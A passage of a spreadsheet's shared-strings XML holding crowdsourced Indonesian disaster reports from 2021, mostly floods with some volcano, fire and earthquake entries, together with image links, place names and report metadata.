    <t>https://images.petabencana.id/ab012a4e-9e49-46c9-b557-1b3d732e1296.jpg</t>
  </si>
  <si>
    <t>Banjir di Jalan Tunas Kelapa sudah berlangsung selama 3 jam dengan curah hujan tinggi. Banjir diakibatkan dari penumpukan sampah.</t>
  </si>
  <si>
    <t>7d49416b-08c7-4114-a56f-a796b4acf0b9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d49416b-08c7-4114-a56f-a796b4acf0b9.jpg</t>
  </si>
  <si>
    <t>Hujan dengan intensitas tinggi menyebabkan naiknya debit air dan meluapnya sungai laweharum. Waktu kejadian Selasa, 15 Juni 2021, Pkl 00.04</t>
  </si>
  <si>
    <t>Muhajirin</t>
  </si>
  <si>
    <t>Deleng Pokhkisen</t>
  </si>
  <si>
    <t>Aceh Tenggara</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ARwuD0zUuFCnHHccAzZ4Fh02mduRusPq-cbXgIU6TZylaZRGVcba-AUwy_8ULyzXoktq5DgTtHWOykAUEDPFRYLtoHoIW2tbzo0oS4cHog=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "798", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>bangunan liar diatas got (saluran air) tapi tidak di tindak oleh aparat kalo hujan sedikit pasti banjir  mohon segera ditindak lanjuti"</t>
  </si>
  <si>
    <t>b7ef2fef-6c53-425a-a448-a4e47b96b23b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7ef2fef-6c53-425a-a448-a4e47b96b23b.jpg</t>
  </si>
  <si>
    <t>Terdapat rumah yang hancur, jalan retak, air laut naik ke pemukiman warga.</t>
  </si>
  <si>
    <t>Saunulu</t>
  </si>
  <si>
    <t>Tehoru</t>
  </si>
  <si>
    <t>Maluku Tengah</t>
  </si>
  <si>
    <t>904bcd24-db65-4cc4-a9d0-cf0d39944d20</t>
  </si>
  <si>
    <t>https://images.petabencana.id/904bcd24-db65-4cc4-a9d0-cf0d39944d20.jpg</t>
  </si>
  <si>
    <t>Pusaran angin berpindah ke darat</t>
  </si>
  <si>
    <t>44baadf7-76c8-437e-a973-0b4817b8a51d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/44baadf7-76c8-437e-a973-0b4817b8a51d.jpg</t>
  </si>
  <si>
    <t>banjir di jl.gandaria ujung rt.09/02 setiap hujan besar pasti selalu banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2K3wiO_YNvznK7tOM_AZAZC_Kcsp7FAjho1g12WDZD2XUv2b6Px_QoS92RhyBawfwsICQtClwdWAR3zMKc-_e-yd8lTXg6iLDTiuK-HeSw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2176", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/359958</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/06/22/16243582601127323635.jpg</t>
  </si>
  <si>
    <t>Jalan Letnan Dua Sujono Medan Tembung Hujan Sore in</t>
  </si>
  <si>
    <t>Hujan mengguyur Jalan Letnan Dua Sujono, Medan Tembung, beberapa ruas dikabarkan banjir</t>
  </si>
  <si>
    <t>Bandar Selamat</t>
  </si>
  <si>
    <t>Medan Tembung</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/359949</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/06/22/16243456081569758595.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1849", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Debit Air di Tanggul Kramat Jati Meningkat, Harap Waspada</t>
  </si>
  <si>
    <t>Imbas hujan yang terus mengguyur ibukota selama beberapa hari, debit air di tanggul Kramat Jati meningkat. Warga harap waspada</t>
  </si>
  <si>
    <t>5997942b-1eb9-4811-90fc-40296176b4c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5997942b-1eb9-4811-90fc-40296176b4c6.jpg</t>
  </si>
  <si>
    <t>banjir setinggi lutut orang dewasa</t>
  </si>
  <si>
    <t>Wonodadi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/2Sh7io4C3L23NeMDoOhncz_8blMiSIH2bjMqJSjmuX6m5SkcZaYSD3N5dbapbblizexbVk7ZmfAXjRxf4NZVfqu53yNqGh9iCxcfeUpv5w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1075", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>saluran got mampet di wilayah RT 04 /011</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/fC89wLZSIKXb91PVQWFwY98xBX29DEAK30YZQ8I7NUV-r-CEgKzuRl_yDEZAuYiTlgIqBYtMFEUlpVWpymY1HoSzNunwXvjPU9_akUwvGV8=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "233", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil banjir jalan menara 8 saluran tidak berfungsi dengan baik</t>
  </si>
  <si>
    <t>73f39756-b8f8-4f27-bb59-611a89e4ec65</t>
  </si>
  <si>
    <t>https://images.petabencana.id/73f39756-b8f8-4f27-bb59-611a89e4ec65.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationNumber": 1, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Luncuran awan panas Merapi ke arah tenggara siang hari tanggal 29 Juni 2021</t>
  </si>
  <si>
    <t>Glagah Harjo</t>
  </si>
  <si>
    <t>8f2ea10b-af66-4b3e-9e56-887444120ff5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f2ea10b-af66-4b3e-9e56-887444120ff5.jpg</t>
  </si>
  <si>
    <t>Banjir di Jl. M. Said. Kemungkinan air sudah turun.</t>
  </si>
  <si>
    <t>Lok Bahu</t>
  </si>
  <si>
    <t>Sungai Kunjang</t>
  </si>
  <si>
    <t>8d1e46a6-2bbe-470a-b4d6-9fe0a814ce8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8d1e46a6-2bbe-470a-b4d6-9fe0a814ce8e.jpg</t>
  </si>
  <si>
    <t>Banjir di Sungai Kunjang dan Samarinda Ulu pada tanggal 2 Juli 2021 pukul 09.00 akibat hujan deras</t>
  </si>
  <si>
    <t>37b53bdf-8781-4c5e-86bb-65511fda1622</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37b53bdf-8781-4c5e-86bb-65511fda1622.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi di sekitar daerah sekolah smkn 1 Banyuwangi</t>
  </si>
  <si>
    <t>Mojopanggung</t>
  </si>
  <si>
    <t>Giri</t>
  </si>
  <si>
    <t>244800f6-1674-4855-afb5-0d3caf4e8383</t>
  </si>
  <si>
    <t>https://images.petabencana.id/244800f6-1674-4855-afb5-0d3caf4e8383.jpg</t>
  </si>
  <si>
    <t>Hujan dengan intensitas lebat menyebabkan Sungai Tripa dan Lamie meluap pada hari Selasa, 6 Juli 2021 Pkl. 03.00 WIB</t>
  </si>
  <si>
    <t>Hutan</t>
  </si>
  <si>
    <t>Beutong</t>
  </si>
  <si>
    <t>Nagan Raya</t>
  </si>
  <si>
    <t>29b9133e-0fcb-4507-b000-777ffd12e3ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/29b9133e-0fcb-4507-b000-777ffd12e3ee.jpg</t>
  </si>
  <si>
    <t>Ketinggian banjir mencapai 90 cm</t>
  </si>
  <si>
    <t>735e852c-5ec9-4592-b195-025014245864</t>
  </si>
  <si>
    <t>https://images.petabencana.id/735e852c-5ec9-4592-b195-025014245864.jpg</t>
  </si>
  <si>
    <t>Biringere</t>
  </si>
  <si>
    <t>Sinjai Utara</t>
  </si>
  <si>
    <t>Sinjai</t>
  </si>
  <si>
    <t>402c4aec-de71-41a3-a221-f836d11c9508</t>
  </si>
  <si>
    <t>https://images.petabencana.id/402c4aec-de71-41a3-a221-f836d11c9508.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi di bengkuring dengan sebagian besar wilayah terendam</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/360237</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/07/09/360237-16257903795430286.mov-03.jpg</t>
  </si>
  <si>
    <t>Antisipasi Banjir, Petugas Keberersihan Keruk Kali Ciliwung</t>
  </si>
  <si>
    <t>Menjelang musim panas kali Ciliwung sedang dikeruk untuk antisipasi banjir</t>
  </si>
  <si>
    <t>5b86df2e-b456-4a4e-84f3-179fe8cd1965</t>
  </si>
  <si>
    <t>Banjir di kali</t>
  </si>
  <si>
    <t>436dad97-2cec-4722-b713-85064d290c86</t>
  </si>
  <si>
    <t>https://images.petabencana.id/436dad97-2cec-4722-b713-85064d290c86.jpg</t>
  </si>
  <si>
    <t>Ini kondisi dirumah yg lumayan tinggi, apa kabar rumah tetangga yg lebih rendah??</t>
  </si>
  <si>
    <t>Sungai Jawi Dalam</t>
  </si>
  <si>
    <t>Pontianak Barat</t>
  </si>
  <si>
    <t>8bd48772-e5b4-4c1d-9d0e-8c41146ecd00</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8bd48772-e5b4-4c1d-9d0e-8c41146ecd00.jpg</t>
  </si>
  <si>
    <t>banjir di jalan batu daya 1, sukadana, kayong utara, kalimantan barat. banjir terjadi tanggal 14 juli 2021. saya mengungsi di pasar daerah</t>
  </si>
  <si>
    <t>Sutra</t>
  </si>
  <si>
    <t>Kayong Utara</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/360381</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/07/18/360381-1626599040708211293.mov-03.jpg</t>
  </si>
  <si>
    <t>Sore Ini Dilakukan Pengerukan Kali Ciliwung</t>
  </si>
  <si>
    <t>Pengerukan  kali Ciliwung sore ini agar saat musim hujan debit air akan lancar</t>
  </si>
  <si>
    <t>7f976c17-be9a-45a0-b217-59faf7b99020</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7f976c17-be9a-45a0-b217-59faf7b99020.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 62.010685, "fireLocation": { "lat": -1.623613, "lng": 110.052452 }, "personLocation": { "lat": -1.678265, "lng": 110.183258 }, "fireRadius": { "lat": -1.623613, "lng": 110.051894 } }</t>
  </si>
  <si>
    <t>Kebakakan Lahan Perkebunan yang terjadi di sore hari yang meluas ke Perkebunan sawit. ( PusdalOps_PB Ketapang )</t>
  </si>
  <si>
    <t>Sungai Putri</t>
  </si>
  <si>
    <t>Matan Hilir Utara</t>
  </si>
  <si>
    <t>13c4cb03-e248-453d-987d-001dd2b90cca</t>
  </si>
  <si>
    <t>Banjir sekitar 1,5-2meter bahkan bisa lebih</t>
  </si>
  <si>
    <t>70fdd9d0-27c4-406f-a752-e50251a08d8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70fdd9d0-27c4-406f-a752-e50251a08d8c.jpg</t>
  </si>
  <si>
    <t>sering terjadi jika curah hujan tinggi</t>
  </si>
  <si>
    <t>800a6485-cab5-488f-b63d-b2a92b46748f</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2655", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di wilayah balekambang</t>
  </si>
  <si>
    <t>10501a23-2144-40e3-9ec8-e01f54add121</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2179", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>26f15573-8562-41fc-9991-5a6c7b2ce84e</t>
  </si>
  <si>
    <t>f4a875e0-0186-457b-ab80-a4b7be0c1aed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f4a875e0-0186-457b-ab80-a4b7be0c1aed.jpg</t>
  </si>
  <si>
    <t>Banjir dikarenakan curah hujan sangat deras selama satu malam yang mengakibatkan air sungai dan bendungan meluap hingga menyebabkan banjir</t>
  </si>
  <si>
    <t>Benteng</t>
  </si>
  <si>
    <t>Pitumpanua</t>
  </si>
  <si>
    <t>Wajo</t>
  </si>
  <si>
    <t>d4b90ff7-25ab-4b2e-b684-5e2adcd4df3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d4b90ff7-25ab-4b2e-b684-5e2adcd4df3d.jpg</t>
  </si>
  <si>
    <t>Sekitar Pasar Sentral Sengkang banjir</t>
  </si>
  <si>
    <t>Lapongkoda</t>
  </si>
  <si>
    <t>Tempe</t>
  </si>
  <si>
    <t>f115cd40-7866-4412-a904-c4af00375c8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f115cd40-7866-4412-a904-c4af00375c8c.jpg</t>
  </si>
  <si>
    <t>Banjir di Dua Baccoe</t>
  </si>
  <si>
    <t>Cabbeng</t>
  </si>
  <si>
    <t>Dua Boccoe</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/wsduH6Yjj8qNrU1-RGPA_UeatilNFAaZ4ync3koZyZr5s8IK71ri09UlSjVb-hFZdN-Pm6ZByXQDW-gj3OMzLzzuKqowS5FNkVSnvNuT=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2448", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>di atas saluran lagi di jadi kan tempat usaha tolong di tindak lanjuti"</t>
  </si>
  <si>
    <t>872d83b9-17f2-45c8-8ae0-1aea8a7a70e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/872d83b9-17f2-45c8-8ae0-1aea8a7a70e4.jpg</t>
  </si>
  <si>
    <t>Sangat dalam! Mobil tidak bisa lewat!!</t>
  </si>
  <si>
    <t>Cibogo</t>
  </si>
  <si>
    <t>Cisauk</t>
  </si>
  <si>
    <t>ec19c06b-10aa-4ea6-839b-d2b219c7b4be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ec19c06b-10aa-4ea6-839b-d2b219c7b4be.jpg</t>
  </si>
  <si>
    <t>Pada tanggal 23 agustus air mulai membanjiri Putussibau kota.</t>
  </si>
  <si>
    <t>Putussibau Kota</t>
  </si>
  <si>
    <t>Putussibau Utara</t>
  </si>
  <si>
    <t>b1dddebf-fcaa-419d-b535-e0ccfde3d0f1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b1dddebf-fcaa-419d-b535-e0ccfde3d0f1.jpg</t>
  </si>
  <si>
    <t>Banjir di Putussibau Kalimantan Barat</t>
  </si>
  <si>
    <t>Kedamin Hilir</t>
  </si>
  <si>
    <t>82e79fe8-f544-4c51-b597-69ba2f9722f1</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 34, "report_type": "flood" }</t>
  </si>
  <si>
    <t>banjir  banjiran</t>
  </si>
  <si>
    <t>Gunungbatu</t>
  </si>
  <si>
    <t>Bogor Barat</t>
  </si>
  <si>
    <t>07b727c8-bac0-43d5-81ea-39bb9568918b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/07b727c8-bac0-43d5-81ea-39bb9568918b.jpg</t>
  </si>
  <si>
    <t>Situasi Banjir di Ds. Temuyuk, Kec. Bunut Hulu, Kab. Kapuas Hulu, Kalbar (18/08/2021)</t>
  </si>
  <si>
    <t>Temuyuk</t>
  </si>
  <si>
    <t>Bunut Hulu</t>
  </si>
  <si>
    <t>3542bb0b-4657-4b89-bfb9-191e6fa9f77d</t>
  </si>
  <si>
    <t>asdasdad</t>
  </si>
  <si>
    <t>Cigadung</t>
  </si>
  <si>
    <t>Cibeunying Kaler</t>
  </si>
  <si>
    <t>9ff76dd4-b2dd-49c8-b80c-d0077aa069fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ff76dd4-b2dd-49c8-b80c-d0077aa069fc.jpg</t>
  </si>
  <si>
    <t>Banjir di cakung barat gang toge Rt 05 Rw 05 disini selalu banjir jika hujan pak.tlong ditindak lanjut</t>
  </si>
  <si>
    <t>2a63320e-934b-4146-a771-d349a8ef75a4</t>
  </si>
  <si>
    <t>gempa kecil, mungkin sekitar 4-5 SR</t>
  </si>
  <si>
    <t>Adipala</t>
  </si>
  <si>
    <t>0bd1c048-9a2b-4d4b-b16e-9528cfdafb62</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0bd1c048-9a2b-4d4b-b16e-9528cfdafb62.jpg</t>
  </si>
  <si>
    <t>Sekitar pukul 14.50 terjadi hujan  intensitas tinggi disertai angin kencang sehingga mengakibatkan 9 rumah mengalami kerusakan</t>
  </si>
  <si>
    <t>9877991c-1427-4f34-b7f9-31483bf20bb8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9877991c-1427-4f34-b7f9-31483bf20bb8.jpg</t>
  </si>
  <si>
    <t>Sekitar pukul 14.50 WIB terjadi hujan intensitas tinggi yang diserati angin kencang yang mengakibatkan kerusakan atap rumah sebanyak 9 rumah</t>
  </si>
  <si>
    <t>71d5559e-e389-4e0f-95a0-dd7e04f905eb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/71d5559e-e389-4e0f-95a0-dd7e04f905eb.jpg</t>
  </si>
  <si>
    <t>Banjir sudah 2 hari mulai tanggal 30 agustu pagi sampai tgl 31 Agustus hari ini air belum surut</t>
  </si>
  <si>
    <t>Tani Aman</t>
  </si>
  <si>
    <t>Loa Janan Ilir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/oP4t3qSOoghkyKVGkFgivNPU272KP4lh29TpbBnezxKOx8_mBESXd4ppL_Atn4NJR26MLfEX7U8fiT6Llf4qkX5pAWVyTMk_ymjYjoohAw=s480-c</t>
  </si>
  <si>
    <t>sampah yang dapat mengakibat kan banjir</t>
  </si>
  <si>
    <t>bcb57942-5607-4476-bb4b-27f049704d29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bcb57942-5607-4476-bb4b-27f049704d29.jpg</t>
  </si>
  <si>
    <t>Banjir dikarenakan air rob dari laut yang selalu naik turun setiap harinya dan kendaraan darat sudah tidak dapat masuk ke desa. Tumbulsloko"</t>
  </si>
  <si>
    <t>08.26.13</t>
  </si>
  <si>
    <t>1eed21e2-633b-4baf-a4d1-ca8a633878e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1eed21e2-633b-4baf-a4d1-ca8a633878e7.jpg</t>
  </si>
  <si>
    <t>Banjir di Kab. Kapuas Hulu, Tepat nya di Kelurahan Kedamin Hilir, Teluk Barak</t>
  </si>
  <si>
    <t>00.09.26</t>
  </si>
  <si>
    <t>68c32356-8109-41eb-a502-336f95c62b11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68c32356-8109-41eb-a502-336f95c62b11.jpg</t>
  </si>
  <si>
    <t>06.00.32</t>
  </si>
  <si>
    <t>a81ab832-f8fd-436d-82f3-4478e2956726</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a81ab832-f8fd-436d-82f3-4478e2956726.jpg</t>
  </si>
  <si>
    <t>Pukul 14.57 Wita TMA 79cm Terong 4 #Relawan Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>06.02.41</t>
  </si>
  <si>
    <t>790a7e3c-1e7b-45e3-a9f8-b6a5faf337ae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/790a7e3c-1e7b-45e3-a9f8-b6a5faf337ae.jpg</t>
  </si>
  <si>
    <t>Terong 4 TMA 79 pukul 16.19 #relawan busam peduli bencana"</t>
  </si>
  <si>
    <t>12.15.20</t>
  </si>
  <si>
    <t>a7649ace-1e47-4c4e-8016-242b21569eb4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7649ace-1e47-4c4e-8016-242b21569eb4.jpg</t>
  </si>
  <si>
    <t>Jl. Asparagus dan terong bengkuring #MDMC SAMARINDA AIDIL FITRIANSYAH</t>
  </si>
  <si>
    <t>02.11.00</t>
  </si>
  <si>
    <t>d6b14927-7916-4f09-9154-f40fa12e1f0d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d6b14927-7916-4f09-9154-f40fa12e1f0d.jpg</t>
  </si>
  <si>
    <t>Banjir Bengkuring Jl. Kastela</t>
  </si>
  <si>
    <t>07.21.31</t>
  </si>
  <si>
    <t>8e2154ee-bc6d-406d-accd-cd99e801331e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8e2154ee-bc6d-406d-accd-cd99e801331e.jpg</t>
  </si>
  <si>
    <t>Banjir Jl. KH Harun Nafsi / Rapak Dalam Samarinda Seberang #Relawan Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>Rapak Dalam</t>
  </si>
  <si>
    <t>09.11.34</t>
  </si>
  <si>
    <t>86292b3a-faee-4759-a4da-21bef4cd34f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/86292b3a-faee-4759-a4da-21bef4cd34f5.jpg</t>
  </si>
  <si>
    <t>Mulai Banjir setelah hujan deras durasi 2 jam, pemantauan jika meningkat #Busam Peduli Bencana"</t>
  </si>
  <si>
    <t>13.06.01</t>
  </si>
  <si>
    <t>4c7c274f-2958-46dc-9e0a-0dd36a2bc7fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4c7c274f-2958-46dc-9e0a-0dd36a2bc7fc.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Batu Badinding,kec katingan tengah,kab katingan,kalimantan tengah</t>
  </si>
  <si>
    <t>13.52.40</t>
  </si>
  <si>
    <t>bd1e26af-6bec-49ff-b402-621284dd1346</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bd1e26af-6bec-49ff-b402-621284dd1346.jpg</t>
  </si>
  <si>
    <t>Katingan, Kalteng banjir. Hingga saat ini belum menerima bansos. Ada 13 Kecamatan, 67 desa.</t>
  </si>
  <si>
    <t>Pendahara</t>
  </si>
  <si>
    <t>Tewang Sangalang Garing</t>
  </si>
  <si>
    <t>Katingan</t>
  </si>
  <si>
    <t>14.07.56</t>
  </si>
  <si>
    <t>87444050-8469-4a70-8b0e-4967803ac868</t>
  </si>
  <si>
    <t>https://images.petabencana.id/87444050-8469-4a70-8b0e-4967803ac868.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Galinggang Kecamatan Kamipang, Kabupaten Katingan Kalimantan Tengah</t>
  </si>
  <si>
    <t>Galinggang</t>
  </si>
  <si>
    <t>Kamipang</t>
  </si>
  <si>
    <t>15.38.36</t>
  </si>
  <si>
    <t>08c8d365-c2b3-4b4a-9cb5-4f06f22b1e4f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/08c8d365-c2b3-4b4a-9cb5-4f06f22b1e4f.jpg</t>
  </si>
  <si>
    <t>Banjir kiriman, di simpang Jl. Apt Pranoto Samarinda Seberang #busam peduli bencana"</t>
  </si>
  <si>
    <t>15.21.33</t>
  </si>
  <si>
    <t>109ca1ec-1867-4e43-8108-974e48aae30a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/109ca1ec-1867-4e43-8108-974e48aae30a.jpg</t>
  </si>
  <si>
    <t>Daerah Katunen, belakang rumah jabatan Bupati lama, kantor bupati lama Kabupaten Katingan. Photo diambil 5sep'21 pkl.15.05wib,&amp; akan naik lg</t>
  </si>
  <si>
    <t>Kasongan Baru</t>
  </si>
  <si>
    <t>Katingan Hilir</t>
  </si>
  <si>
    <t>17.12.34</t>
  </si>
  <si>
    <t>892b6899-8dae-47bb-aafb-de2e24454d7e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/892b6899-8dae-47bb-aafb-de2e24454d7e.jpg</t>
  </si>
  <si>
    <t>Kalimantan Tengah Mengalami bencana banjir separu dari jumlah kabupaten yang ada di kalteng di landa banjir</t>
  </si>
  <si>
    <t>17.37.12</t>
  </si>
  <si>
    <t>8fd61bd4-6746-4e7b-9ea2-95e8bf4024d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8fd61bd4-6746-4e7b-9ea2-95e8bf4024d9.jpg</t>
  </si>
  <si>
    <t>22.49.37</t>
  </si>
  <si>
    <t>ee6f2806-4dc5-460b-873d-e424529fcee7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ee6f2806-4dc5-460b-873d-e424529fcee7.jpg</t>
  </si>
  <si>
    <t>Foto di ambil pada tanggal 5 September 2021 oleh InfoPky debit air semakin meningkat akibat curah hujan yg tinggi di bagian Hulu sungai Khyn</t>
  </si>
  <si>
    <t>Tanjung Sanggalang</t>
  </si>
  <si>
    <t>Kahayan Tengah</t>
  </si>
  <si>
    <t>Pulang Pisau</t>
  </si>
  <si>
    <t>07.22.00</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cXCZrWh58HZ13QAVdaUnqJtdh4-0MsXW5aCQrzHZ1jx38hGxa7u1mq_Dtg9F458qfHMoinCZT_v8Ftjd9ZfLfE4kFgyl5WkOIqhfzLZJ=s480-c</t>
  </si>
  <si>
    <t>tolong pihak terkait mohon dibersihkan sampah dah numpuk di saluran  . banyak nyamuk .air kagak bisa ngalir sekian dan terima kasih</t>
  </si>
  <si>
    <t>10.07.07</t>
  </si>
  <si>
    <t>9d2140ef-a681-43fd-83bb-0daf2bb98084</t>
  </si>
  <si>
    <t>Banjir Di Samarinda</t>
  </si>
  <si>
    <t>Dadi Mulya</t>
  </si>
  <si>
    <t>11.27.15</t>
  </si>
  <si>
    <t>bdbb7f57-e20c-437e-acc9-50586b847bcf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bdbb7f57-e20c-437e-acc9-50586b847bcf.jpg</t>
  </si>
  <si>
    <t>Jl. Terong pipit 1 air naik kembali akibat hujan</t>
  </si>
  <si>
    <t>12.31.09</t>
  </si>
  <si>
    <t>b25ad42f-08ba-4809-b9d7-f270f3bb84fb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b25ad42f-08ba-4809-b9d7-f270f3bb84fb.jpg</t>
  </si>
  <si>
    <t>Jl. Ruhui rahayu belatuk 2</t>
  </si>
  <si>
    <t>12.52.47</t>
  </si>
  <si>
    <t>f2ad3360-d6d9-441c-932e-4806ca17899d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2ad3360-d6d9-441c-932e-4806ca17899d.jpg</t>
  </si>
  <si>
    <t>Pemuda 3 dalam kondisi air aman</t>
  </si>
  <si>
    <t>17.20.53</t>
  </si>
  <si>
    <t>2126c7a0-349f-442a-80fb-37fd0557498f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2126c7a0-349f-442a-80fb-37fd0557498f.jpg</t>
  </si>
  <si>
    <t>Banjir terparah di Kalimantan tengah pada dekade ini</t>
  </si>
  <si>
    <t>Kuala Kuayan</t>
  </si>
  <si>
    <t>Mentaya Hulu</t>
  </si>
  <si>
    <t>18.52.36</t>
  </si>
  <si>
    <t>f2b8f38e-b9ba-4e29-8d5c-c1d9ae3a6327</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f2b8f38e-b9ba-4e29-8d5c-c1d9ae3a6327.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 145 }</t>
  </si>
  <si>
    <t>Desa Tbg Hiran dan Tumbang Sanamang alami hal yg sama hingga ke katingan tengah.</t>
  </si>
  <si>
    <t>Tumbang Mangketai</t>
  </si>
  <si>
    <t>Katingan Hulu</t>
  </si>
  <si>
    <t>00.43.03</t>
  </si>
  <si>
    <t>ea283d4e-df6c-44df-9e11-aaff74b31434</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ea283d4e-df6c-44df-9e11-aaff74b31434.jpg</t>
  </si>
  <si>
    <t>Jl. Banjir di Jl. Sutomo, Samarinda, TMA Mencapai 10 - 30 cm</t>
  </si>
  <si>
    <t>04.02.46</t>
  </si>
  <si>
    <t>5323e37f-80b7-4e60-99db-83f34d007c2f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5323e37f-80b7-4e60-99db-83f34d007c2f.jpg</t>
  </si>
  <si>
    <t>Jl. Dr. Sutomo dekat gang nimbung</t>
  </si>
  <si>
    <t>Sidodadi</t>
  </si>
  <si>
    <t>04.07.34</t>
  </si>
  <si>
    <t>6032a31c-c6fa-4576-a2c2-9c72198c666e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6032a31c-c6fa-4576-a2c2-9c72198c666e.jpg</t>
  </si>
  <si>
    <t>Depan lembuswana samarinda</t>
  </si>
  <si>
    <t>04.52.13</t>
  </si>
  <si>
    <t>a7d4de92-89e2-4c1f-9724-98b7bf3e74bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7d4de92-89e2-4c1f-9724-98b7bf3e74bb.jpg</t>
  </si>
  <si>
    <t>Jl. Kestela 3 bengkuring</t>
  </si>
  <si>
    <t>05.03.12</t>
  </si>
  <si>
    <t>7c4006a7-fc66-49ee-8b1c-11334834b296</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7c4006a7-fc66-49ee-8b1c-11334834b296.jpg</t>
  </si>
  <si>
    <t>Jl. Terong bengkuring</t>
  </si>
  <si>
    <t>05.16.17</t>
  </si>
  <si>
    <t>038f943a-ea3e-4d02-8339-d460a300a840</t>
  </si>
  <si>
    <t>https://images.petabencana.id/038f943a-ea3e-4d02-8339-d460a300a840.jpg</t>
  </si>
  <si>
    <t>Jl. Terong 1 bengkuring</t>
  </si>
  <si>
    <t>08.31.25</t>
  </si>
  <si>
    <t>5567237d-7dbe-4644-918c-cf6c0d7dd5c8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5567237d-7dbe-4644-918c-cf6c0d7dd5c8.jpg</t>
  </si>
  <si>
    <t>Kejadian banjir di wilayah Kab. Katingan, tepatnya di Kel. Kasongan Lama Kec.Kasongan Hilir, banjir menggenangi ruas jalan dan rumah pendudu</t>
  </si>
  <si>
    <t>Kasongan Lama</t>
  </si>
  <si>
    <t>09.09.25</t>
  </si>
  <si>
